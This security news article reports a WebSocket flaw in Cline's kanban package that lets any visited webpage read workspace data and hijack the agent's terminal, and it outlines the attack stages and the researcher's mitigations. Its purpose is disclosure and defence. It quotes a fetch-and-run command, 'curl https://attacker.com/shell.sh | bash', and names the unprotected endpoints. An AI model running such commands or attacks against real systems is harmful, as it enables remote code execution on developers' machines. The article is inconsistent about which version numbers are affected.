A critical vulnerability in the Cline AI coding assistant’s kanban package puts developers at immediate risk of remote code execution, data theft, and denial-of-service attacks, triggered simply by visiting a malicious website.
Security researcher Sagilayani publicly disclosed CVE-2026-44211 on GitHub, revealing that the kanban npm package bundled with the Cline CLI silently starts a WebSocket server on 127.0.0.1:3484 with absolutely no Origin header validation.
The flaw carries a CVSS v3.1 score of 9.3 (Critical) and affects all versions of Cline before v2.13.0. No patch is currently available.
Unlike standard HTTP requests, WebSocket connections bypass browser CORS protections entirely. This architectural quirk means that any webpage a developer visits can silently connect to the local kanban WebSocket server without restriction, with no user interaction, no warning, and no prompt.
The attack unfolds across four distinct stages once a victim visits an attacker-controlled webpage with the kanban server running.
First, the malicious page connects to ws://127.0.0.1:3484/api/runtime/ws and immediately receives a full workspace snapshot, including filesystem paths, git branch names, task titles, and live AI agent chat messages.
The same WebSocket stream then exposes task_sessions_updated events, revealing when an AI agent session becomes active along with its task ID and process ID.
From there, the attacker escalates to terminal hijack and full remote code execution by connecting to /api/terminal/io and injecting an arbitrary shell prompt, such as curl https://attacker.com/shell.sh | bash followed by a carriage return which the AI agent executes as a user command.
Finally, the /api/terminal/control endpoint lets the attacker kill any running agent session by sending a simple {"type": "stop"} message, completing the denial-of-service capability.
Zero Authentication Across All Three Endpoints
All three vulnerable endpoints /api/runtime/ws, /api/terminal/io, and /api/terminal/control require no authentication and perform no Origin validation whatsoever.
The vulnerability is rooted in two CWEs: CWE-306 (Missing Authentication for Critical Function) and CWE-1385 (Missing Origin Validation in WebSockets).
The server’s WebSocket upgrade handler processes incoming connections without verifying whether the request originates from the legitimate kanban UI or an external attacker-controlled page.
Sagilayani confirmed the vulnerability across macOS, Linux, and Windows, and it tested successfully on Firefox, Chrome, and Arc browsers.
A proof-of-concept demonstrating the full attack chain, including a macOS native dialog as proof of execution, was published alongside the disclosure.
The flaw compromises all three dimensions of the CIA triad. Workspace paths, git repository data, and AI chat messages leak in real-time (Confidentiality).
Arbitrary shell commands execute inside the developer’s local environment via terminal hijack (Integrity). Active agent tasks can be silently terminated at will (Availability).
Until a fix is released, Sagilayani recommends three mitigations for the Cline team: validate the Origin header on all WebSocket upgrade requests and reject non-localhost origins; generate a random secret token at server startup.
It requires it as a query parameter on all WebSocket connections, and adds authentication checks to terminal WebSocket endpoints to verify the connecting client is the legitimate kanban UI.
Developers running Cline v2.13.0 or earlier with the kanban feature enabled should avoid running the kanban server in untrusted network environments until an official patch is released.
No Comment! Be the first one.